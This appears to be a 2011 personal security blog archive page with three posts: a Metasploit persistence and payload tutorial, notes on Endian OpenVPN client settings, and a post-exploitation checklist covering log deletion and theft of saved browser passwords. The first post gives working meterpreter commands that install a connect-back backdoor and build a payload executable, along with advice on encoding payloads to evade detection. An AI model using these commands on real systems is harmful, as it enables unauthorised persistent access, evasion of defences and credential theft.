Posts

Showing posts from June, 2011

Metasploit Backdoor Tutorial

Backdoor:
Creates a persistent backdoor
Can be configured to connect back on system boot or at user login
The interval between connect-back attempts can be set
Under the hood
    Creates a VBS file on the victim and executes it
    Adds registry entries so it is autorun
Can be uninstalled remotely
    The VBS file must be deleted manually
meterpreter > run persistence
meterpreter > run persistence -A -U -i 10 -p 3000 -r 192.168.1.10

Metsvc backdoor
Runs as a service on the victim
Connect to it remotely
    No authentication required
Can be uninstalled remotely
    The files must be deleted manually
Less noisy compared to persistence
    The attacker connects only when he wants to
Can be found by port scanning
Demo: Backdoor with Metsvc



Create Executable from payloads
Msfpayload
Use: msfpayload [var=val] [S]ummary|[C]|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecutable|[D]ll|[V]BA|[W]ar;
Ex:
msfpayload windows/meterpreter/bind_tcp RHOST=192.168.1.100 X > bind_tcp.exe
Encoding to obfuscate the payload
Encode the payload to evade detection
Encode payloa…

Endian - VPN client to site (host to network)

A friend asked me about it. I recognize that many companies in Vietnam like using Endian. But as for me, I like Vyatta more, because I like dealing with routing. :))
It is simple to configure if you have some experience with OpenVPN. Endian uses OpenVPN for its VPN server.
In the client config you will notice these options:
dev tap : for DHCP service
ca endian.pem : the CA cert; it does not use a client cert like IPCop does
remote <Endian IP or hostname> : of course
auth-user-pass : the user and password that were created.

Demo:




or: http://www.mediafire.com/?2qdhttek586be81
------------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
All my Lab:
Linux Lab -- Windows and Cisco Lab
to be continued - I will update more.

Metasploit: stealing data, getting saved passwords and sniffing passwords

My friend asked me: what will you do after the exploit? So I answered: privilege escalation, or stealing data. I have some advice on the phases of post-exploitation:
1. Understanding the victim better
2. Privilege escalation
3. Deleting logs and killing monitoring software
4. Collecting data, executing programs
    Search for a file
    Download files
    Download the registry
    Download application data
        Outlook
        Browser passwords/sessions
        ...etc
5. Backdoors and rootkits
6. Using the victim as a pivot to hack deeper into the network
I made one video demo of it: using Metasploit to steal data and get Firefox saved passwords:



